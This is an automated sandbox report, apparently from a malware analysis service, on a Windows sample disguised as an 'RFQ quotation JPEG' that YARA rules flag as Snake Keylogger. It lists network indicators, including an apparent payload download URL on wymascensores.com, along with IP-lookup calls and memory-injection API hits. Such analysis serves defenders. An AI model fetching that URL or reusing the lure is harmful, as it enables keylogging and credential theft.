                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: wymascensores.com
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: InstallUtil.exe, 00000002.00000002.4524686788.0000000003027000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000003035000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DEA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E32000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000029A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: InstallUtil.exe, 00000002.00000002.4524686788.0000000003027000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000003007000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000003035000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DEA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E32000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000029EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: InstallUtil.exe, 00000002.00000002.4524686788.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000028E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.000000000259A000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.00000000027C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: InstallUtil.exe, 00000005.00000002.4524242471.0000000002DEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgh
                Source: InstallUtil.exe, 00000002.00000002.4524686788.0000000003027000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000003035000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F56000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DEA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E32000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003251000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.000000000261D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000028E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2248365081.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2322264218.0000000004015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: InstallUtil.exe, 00000002.00000002.4524686788.0000000003027000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000003035000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DEA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E32000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000029A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.000000000259A000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000029A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: InstallUtil.exe, 00000007.00000002.4525996681.0000000002A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                Source: InstallUtil.exe, 00000002.00000002.4524686788.0000000003027000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000003035000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DEA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E32000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003299000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wymascensores.com
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.0000000002611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wymascensores.com/panel/Skdqhzzwa.mp3
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:49732 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000003.00000002.2224812433.000000000259A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000006.00000002.2301023518.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: RFQ____RM quotation_JPEG IMAGE.img.exe PID: 3148, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RFQ____RM quotation_JPEG IMAGE.img.exe PID: 3148, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: Gydvapkca.exe PID: 5332, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Gydvapkca.exe PID: 5332, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: InstallUtil.exe PID: 3176, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: InstallUtil.exe PID: 3176, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: Gydvapkca.exe PID: 6716, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Gydvapkca.exe PID: 6716, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: initial sampleStatic PE information: Filename: RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_064F14F8 NtProtectVirtualMemory,0_2_064F14F8
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_064F2A30 NtResumeThread,0_2_064F2A30
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_064F14F0 NtProtectVirtualMemory,0_2_064F14F0
